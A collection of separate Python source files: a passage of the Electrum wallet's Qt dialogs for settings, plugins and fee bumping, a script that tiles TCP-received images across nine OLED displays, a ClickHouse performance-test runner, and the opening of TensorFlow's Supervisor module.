unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
updated_Display_Run.py
|
import cv2
import _thread
import time
import socket
import base64
import numpy
import multiprocessing as mp
from luma.core.interface.serial import i2c
from luma.core.render import canvas
from luma.oled.device import ssd1306, ssd1325, ssd1331, sh1106
from time import sleep
from PIL import Image
full_Data = b''
TCP_IP = '192.168.0.101'
TCP_PORT = 5050
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
s.listen(True)
conn, addr = s.accept()
# print(full_Data)
n_rows = 3
n_images_per_row = 3
width = 384
height = 192
dim = (width, height)
serial9 = i2c(port=11, address=0x3C)
device9 = ssd1306(serial9)
serial8 = i2c(port=10, address=0x3C)
device8 = ssd1306(serial8)
serial7 = i2c(port=9, address=0x3C)
device7 = ssd1306(serial7)
serial6 = i2c(port=8, address=0x3C)
device6 = ssd1306(serial6)
serial5 = i2c(port=7, address=0x3C)
device5 = ssd1306(serial5)
serial4 = i2c(port=6, address=0x3C)
device4 = ssd1306(serial4)
serial3 = i2c(port=5, address=0x3C)
device3 = ssd1306(serial3)
serial2 = i2c(port=4, address=0x3C)
device2 = ssd1306(serial2)
serial1 = i2c(port=3, address=0x3C)
device1 = ssd1306(serial1)
def print_Image(image,device):
device.display(image)
#print("print image1")
def print_Image2(image,device):
device.display(image)
#print("print image2")
def print_Image3(image,device):
device.display(image)
#print("print image3")
def print_Image4(image,device):
device.display(image)
#print("print image4")
def print_Image5(image,device):
device.display(image)
def print_Image6(image,device):
device.display(image)
def print_Image7(image,device):
device.display(image)
def print_Image8(image,device):
device.display(image)
def print_Image9(image,device):
device.display(image)
'''def process_1(image,device4,image2,device3):
print("Process1_called")
#device4.display(image)
#device3.display(image2)
_thread.start_new_thread(print_Image, (image,device4),)
_thread.start_new_thread(print_Image2, (image2,device3),)
def process_2(image3,device2,image4,device1):
print("Process2_called")
#device2.display(image3)
#device1.display(image4)
_thread.start_new_thread(print_Image3, (image3,device2),)
_thread.start_new_thread(print_Image4, (image4,device1),)
'''
while True:
while True:
stringData = conn.recv(4096)
#print(stringData)
#time.sleep(1)
#print(data)
if len(stringData) <= 0:
break
full_Data += stringData
data= base64.b64decode(full_Data)
nparr = numpy.frombuffer(data,dtype='uint8')
decimg=cv2.imdecode(nparr,0)
start_time = time.time()
#ret, frame = cap.read()
#cap = cv2.cvtColor(cap, cv2.COLOR_RGB2GRAY)
cap = cv2.resize(decimg, dim, interpolation = cv2.INTER_AREA)
height, width = cap.shape
roi_height = int(height / n_rows)
roi_width = int(width / n_images_per_row)
images = []
for x in range(0, n_rows):
for y in range(0, n_images_per_row):
tmp_image=cap[x*roi_height:(x+1)*roi_height, y*roi_width:(y+1)*roi_width]
images.append(tmp_image)
#Display image
for x in range(0, n_rows):
for y in range(0, n_images_per_row):
cv2.imshow(str(x*n_images_per_row+y+1),images[x*n_images_per_row+y])
cv2.moveWindow(str(x*n_images_per_row+y+1), 100+(y*roi_width), 50+(x*roi_height))
#image = Image.fromarray(images[0]).convert('1')
#image2 = Image.fromarray(images[1]).convert('1')
#image3 = Image.fromarray(images[2]).convert('1')
#image4 = Image.fromarray(images[3]).convert('1')
#time.sleep(.01)
#a=mp.Process(target=process_1, args=(image,image2,device4,device3,))
#b=mp.Process(target=process_2, args=(image3,image4,device2,device1,))
#time.sleep(.052)
#_thread.start_new_thread(print_Image, (image,device4),)
#_thread.start_new_thread(print_Image2, (image2,device3),)
#_thread.start_new_thread(print_Image3, (image3,device2),)
#_thread.start_new_thread(print_Image4, (image4,device1),)
#a.start()
#a.join()
#b.start()
#b.join()
image = Image.fromarray(images[0]).convert('1')
image2 = Image.fromarray(images[1]).convert('1')
image3 = Image.fromarray(images[2]).convert('1')
image4 = Image.fromarray(images[3]).convert('1')
image5 = Image.fromarray(images[4]).convert('1')
image6 = Image.fromarray(images[5]).convert('1')
image7 = Image.fromarray(images[6]).convert('1')
image8 = Image.fromarray(images[7]).convert('1')
image9 = Image.fromarray(images[8]).convert('1')
time.sleep(.5)
_thread.start_new_thread(print_Image, (image,device9),)
_thread.start_new_thread(print_Image2, (image2,device8),)
_thread.start_new_thread(print_Image3, (image3,device7),)
_thread.start_new_thread(print_Image4, (image4,device6),)
_thread.start_new_thread(print_Image5, (image5,device5),)
_thread.start_new_thread(print_Image6, (image6,device4),)
_thread.start_new_thread(print_Image7, (image7,device3),)
_thread.start_new_thread(print_Image8, (image8,device2),)
_thread.start_new_thread(print_Image9, (image9,device1),)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
print(time.time()-start_time)
cap.release()
cv2.destroyAllWindows()
s.close()
|
perf.py
|
#!/usr/bin/python3
import argparse
import clickhouse_driver
import itertools
import functools
import math
import os
import pprint
import random
import re
import statistics
import string
import sys
import time
import traceback
import logging
import xml.etree.ElementTree as et
from threading import Thread
from scipy import stats
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(module)s: %(message)s', level='WARNING')
total_start_seconds = time.perf_counter()
stage_start_seconds = total_start_seconds
def reportStageEnd(stage):
global stage_start_seconds, total_start_seconds
current = time.perf_counter()
print(f'stage\t{stage}\t{current - stage_start_seconds:.3f}\t{current - total_start_seconds:.3f}')
stage_start_seconds = current
def tsv_escape(s):
return s.replace('\\', '\\\\').replace('\t', '\\t').replace('\n', '\\n').replace('\r','')
parser = argparse.ArgumentParser(description='Run performance test.')
# Explicitly decode files as UTF-8 because sometimes we have Russian characters in queries, and LANG=C is set.
parser.add_argument('file', metavar='FILE', type=argparse.FileType('r', encoding='utf-8'), nargs=1, help='test description file')
parser.add_argument('--host', nargs='*', default=['localhost'], help="Space-separated list of server hostname(s). Corresponds to '--port' options.")
parser.add_argument('--port', nargs='*', default=[9000], help="Space-separated list of server port(s). Corresponds to '--host' options.")
parser.add_argument('--runs', type=int, default=1, help='Number of query runs per server.')
parser.add_argument('--max-queries', type=int, default=None, help='Test no more than this number of queries, chosen at random.')
parser.add_argument('--queries-to-run', nargs='*', type=int, default=None, help='Space-separated list of indexes of queries to test.')
parser.add_argument('--profile-seconds', type=int, default=0, help='For how many seconds to profile a query for which the performance has changed.')
parser.add_argument('--long', action='store_true', help='Do not skip the tests tagged as long.')
parser.add_argument('--print-queries', action='store_true', help='Print test queries and exit.')
parser.add_argument('--print-settings', action='store_true', help='Print test settings and exit.')
parser.add_argument('--keep-created-tables', action='store_true', help="Don't drop the created tables after the test.")
parser.add_argument('--use-existing-tables', action='store_true', help="Don't create or drop the tables, use the existing ones instead.")
args = parser.parse_args()
reportStageEnd('start')
test_name = os.path.splitext(os.path.basename(args.file[0].name))[0]
tree = et.parse(args.file[0])
root = tree.getroot()
reportStageEnd('parse')
# Process query parameters
subst_elems = root.findall('substitutions/substitution')
available_parameters = {} # { 'table': ['hits_10m', 'hits_100m'], ... }
for e in subst_elems:
available_parameters[e.find('name').text] = [v.text for v in e.findall('values/value')]
# Takes parallel lists of templates, substitutes them with all combos of
# parameters. The set of parameters is determined based on the first list.
# Note: keep the order of queries -- sometimes we have DROP IF EXISTS
# followed by CREATE in create queries section, so the order matters.
def substitute_parameters(query_templates, other_templates = []):
query_results = []
other_results = [[]] * (len(other_templates))
for i, q in enumerate(query_templates):
keys = set(n for _, n, _, _ in string.Formatter().parse(q) if n)
values = [available_parameters[k] for k in keys]
combos = itertools.product(*values)
for c in combos:
with_keys = dict(zip(keys, c))
query_results.append(q.format(**with_keys))
for j, t in enumerate(other_templates):
other_results[j].append(t[i].format(**with_keys))
if len(other_templates):
return query_results, other_results
else:
return query_results
# Build a list of test queries, substituting parameters to query templates,
# and reporting the queries marked as short.
test_queries = []
is_short = []
for e in root.findall('query'):
new_queries, [new_is_short] = substitute_parameters([e.text], [[e.attrib.get('short', '0')]])
test_queries += new_queries
is_short += [eval(s) for s in new_is_short]
assert(len(test_queries) == len(is_short))
# If we're given a list of queries to run, check that it makes sense.
for i in args.queries_to_run or []:
if i < 0 or i >= len(test_queries):
print(f'There is no query no. {i} in this test, only [{0}-{len(test_queries) - 1}] are present')
exit(1)
# If we're only asked to print the queries, do that and exit.
if args.print_queries:
for i in args.queries_to_run or range(0, len(test_queries)):
print(test_queries[i])
exit(0)
# Print short queries
for i, s in enumerate(is_short):
if s:
print(f'short\t{i}')
# If we're only asked to print the settings, do that and exit. These are settings
# for clickhouse-benchmark, so we print them as command line arguments, e.g.
# '--max_memory_usage=10000000'.
if args.print_settings:
for s in root.findall('settings/*'):
print(f'--{s.tag}={s.text}')
exit(0)
# Skip long tests
if not args.long:
for tag in root.findall('.//tag'):
if tag.text == 'long':
print('skipped\tTest is tagged as long.')
sys.exit(0)
# Print report threshold for the test if it is set.
ignored_relative_change = 0.05
if 'max_ignored_relative_change' in root.attrib:
ignored_relative_change = float(root.attrib["max_ignored_relative_change"])
print(f'report-threshold\t{ignored_relative_change}')
reportStageEnd('before-connect')
# Open connections
servers = [{'host': host or args.host[0], 'port': port or args.port[0]} for (host, port) in itertools.zip_longest(args.host, args.port)]
all_connections = [clickhouse_driver.Client(**server) for server in servers]
for i, s in enumerate(servers):
print(f'server\t{i}\t{s["host"]}\t{s["port"]}')
reportStageEnd('connect')
if not args.use_existing_tables:
# Run drop queries, ignoring errors. Do this before all other activity,
# because clickhouse_driver disconnects on error (this is not configurable),
# and the new connection loses the changes in settings.
drop_query_templates = [q.text for q in root.findall('drop_query')]
drop_queries = substitute_parameters(drop_query_templates)
for conn_index, c in enumerate(all_connections):
for q in drop_queries:
try:
c.execute(q)
print(f'drop\t{conn_index}\t{c.last_query.elapsed}\t{tsv_escape(q)}')
except:
pass
reportStageEnd('drop-1')
# Apply settings.
# If there are errors, report them and continue -- maybe a new test uses a setting
# that is not in master, but the queries can still run. If we have multiple
# settings and one of them throws an exception, all previous settings for this
# connection will be reset, because the driver reconnects on error (not
# configurable). So the end result is uncertain, but hopefully we'll be able to
# run at least some queries.
settings = root.findall('settings/*')
for conn_index, c in enumerate(all_connections):
for s in settings:
# requires clickhouse-driver >= 1.1.5 to accept arbitrary new settings
# (https://github.com/mymarilyn/clickhouse-driver/pull/142)
c.settings[s.tag] = s.text
reportStageEnd('settings')
# Check tables that should exist. If they don't exist, just skip this test.
tables = [e.text for e in root.findall('preconditions/table_exists')]
for t in tables:
for c in all_connections:
try:
res = c.execute("select 1 from {} limit 1".format(t))
except:
exception_message = traceback.format_exception_only(*sys.exc_info()[:2])[-1]
skipped_message = ' '.join(exception_message.split('\n')[:2])
print(f'skipped\t{tsv_escape(skipped_message)}')
sys.exit(0)
reportStageEnd('preconditions')
if not args.use_existing_tables:
# Run create and fill queries. We will run them simultaneously for both
# servers, to save time. The weird XML search + filter is because we want to
# keep the relative order of elements, and etree doesn't support the
# appropriate xpath query.
create_query_templates = [q.text for q in root.findall('./*')
if q.tag in ('create_query', 'fill_query')]
create_queries = substitute_parameters(create_query_templates)
# Disallow temporary tables, because the clickhouse_driver reconnects on
# errors, and temporary tables are destroyed. We want to be able to continue
# after some errors.
for q in create_queries:
if re.search('create temporary table', q, flags=re.IGNORECASE):
print(f"Temporary tables are not allowed in performance tests: '{q}'",
file = sys.stderr)
sys.exit(1)
def do_create(connection, index, queries):
for q in queries:
connection.execute(q)
print(f'create\t{index}\t{connection.last_query.elapsed}\t{tsv_escape(q)}')
threads = [
Thread(target = do_create, args = (connection, index, create_queries))
for index, connection in enumerate(all_connections)]
for t in threads:
t.start()
for t in threads:
t.join()
reportStageEnd('create')
# By default, test all queries.
queries_to_run = range(0, len(test_queries))
if args.max_queries:
# If specified, test a limited number of queries chosen at random.
queries_to_run = random.sample(range(0, len(test_queries)), min(len(test_queries), args.max_queries))
if args.queries_to_run:
# Run the specified queries.
queries_to_run = args.queries_to_run
# Run test queries.
profile_total_seconds = 0
for query_index in queries_to_run:
q = test_queries[query_index]
query_prefix = f'{test_name}.query{query_index}'
# We have some crazy long queries (about 100kB), so trim them to a sane
# length. This means we can't use query text as an identifier and have to
# use the test name + the test-wide query index.
query_display_name = q
if len(query_display_name) > 1000:
query_display_name = f'{query_display_name[:1000]}...({query_index})'
print(f'display-name\t{query_index}\t{tsv_escape(query_display_name)}')
# Prewarm: run once on both servers. Helps to bring the data into memory,
# precompile the queries, etc.
# A query might not run on the old server if it uses a function added in the
# new one. We want to run them on the new server only, so that the PR author
# can ensure that the test works properly. Remember the errors we had on
# each server.
query_error_on_connection = [None] * len(all_connections);
for conn_index, c in enumerate(all_connections):
try:
prewarm_id = f'{query_prefix}.prewarm0'
# Will also detect too long queries during warmup stage
res = c.execute(q, query_id = prewarm_id, settings = {'max_execution_time': 10})
print(f'prewarm\t{query_index}\t{prewarm_id}\t{conn_index}\t{c.last_query.elapsed}')
except KeyboardInterrupt:
raise
except:
# FIXME the driver reconnects on error and we lose settings, so this
# might lead to further errors or unexpected behavior.
query_error_on_connection[conn_index] = traceback.format_exc();
continue
# Report all errors that ocurred during prewarm and decide what to do next.
# If prewarm fails for the query on all servers -- skip the query and
# continue testing the next query.
# If prewarm fails on one of the servers, run the query on the rest of them.
no_errors = []
for i, e in enumerate(query_error_on_connection):
if e:
print(e, file = sys.stderr)
else:
no_errors.append(i)
if len(no_errors) == 0:
continue
elif len(no_errors) < len(all_connections):
print(f'partial\t{query_index}\t{no_errors}')
this_query_connections = [all_connections[index] for index in no_errors]
# Now, perform measured runs.
# Track the time spent by the client to process this query, so that we can
# notice the queries that take long to process on the client side, e.g. by
# sending excessive data.
start_seconds = time.perf_counter()
server_seconds = 0
profile_seconds = 0
run = 0
# Arrays of run times for each connection.
all_server_times = []
for conn_index, c in enumerate(this_query_connections):
all_server_times.append([])
while True:
run_id = f'{query_prefix}.run{run}'
for conn_index, c in enumerate(this_query_connections):
try:
res = c.execute(q, query_id = run_id)
except Exception as e:
# Add query id to the exception to make debugging easier.
e.args = (run_id, *e.args)
e.message = run_id + ': ' + e.message
raise
elapsed = c.last_query.elapsed
all_server_times[conn_index].append(elapsed)
server_seconds += elapsed
print(f'query\t{query_index}\t{run_id}\t{conn_index}\t{elapsed}')
if elapsed > 10:
# Stop processing pathologically slow queries, to avoid timing out
# the entire test task. This shouldn't really happen, so we don't
# need much handling for this case and can just exit.
print(f'The query no. {query_index} is taking too long to run ({elapsed} s)', file=sys.stderr)
exit(2)
# Be careful with the counter, after this line it's the next iteration
# already.
run += 1
# Try to run any query for at least the specified number of times,
# before considering other stop conditions.
if run < args.runs:
continue
# For very short queries we have a special mode where we run them for at
# least some time. The recommended lower bound of run time for "normal"
# queries is about 0.1 s, and we run them about 10 times, giving the
# time per query per server of about one second. Use this value as a
# reference for "short" queries.
if is_short[query_index]:
if server_seconds >= 2 * len(this_query_connections):
break
# Also limit the number of runs, so that we don't go crazy processing
# the results -- 'eqmed.sql' is really suboptimal.
if run >= 500:
break
else:
if run >= args.runs:
break
client_seconds = time.perf_counter() - start_seconds
print(f'client-time\t{query_index}\t{client_seconds}\t{server_seconds}')
# Run additional profiling queries to collect profile data, but only if test times appeared to be different.
# We have to do it after normal runs because otherwise it will affect test statistics too much
if len(all_server_times) != 2:
continue
if len(all_server_times[0]) < 3:
# Don't fail if for some reason there are not enough measurements.
continue
pvalue = stats.ttest_ind(all_server_times[0], all_server_times[1], equal_var = False).pvalue
median = [statistics.median(t) for t in all_server_times]
# Keep this consistent with the value used in report. Should eventually move
# to (median[1] - median[0]) / min(median), which is compatible with "times"
# difference we use in report (max(median) / min(median)).
relative_diff = (median[1] - median[0]) / median[0]
print(f'diff\t{query_index}\t{median[0]}\t{median[1]}\t{relative_diff}\t{pvalue}')
if abs(relative_diff) < ignored_relative_change or pvalue > 0.05:
continue
# Perform profile runs for fixed amount of time. Don't limit the number
# of runs, because we also have short queries.
profile_start_seconds = time.perf_counter()
run = 0
while time.perf_counter() - profile_start_seconds < args.profile_seconds:
run_id = f'{query_prefix}.profile{run}'
for conn_index, c in enumerate(this_query_connections):
try:
res = c.execute(q, query_id = run_id, settings = {'query_profiler_real_time_period_ns': 10000000})
print(f'profile\t{query_index}\t{run_id}\t{conn_index}\t{c.last_query.elapsed}')
except Exception as e:
# Add query id to the exception to make debugging easier.
e.args = (run_id, *e.args)
e.message = run_id + ': ' + e.message
raise
run += 1
profile_total_seconds += time.perf_counter() - profile_start_seconds
print(f'profile-total\t{profile_total_seconds}')
reportStageEnd('run')
# Run drop queries
if not args.keep_created_tables and not args.use_existing_tables:
drop_queries = substitute_parameters(drop_query_templates)
for conn_index, c in enumerate(all_connections):
for q in drop_queries:
c.execute(q)
print(f'drop\t{conn_index}\t{c.last_query.elapsed}\t{tsv_escape(q)}')
reportStageEnd('drop-2')
|
supervisor.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of Tensorflow
training programs.
Use for a single program:
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a Tensorflow session.
sess = sv.prepare_or_create_session(FLAGS.master)
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
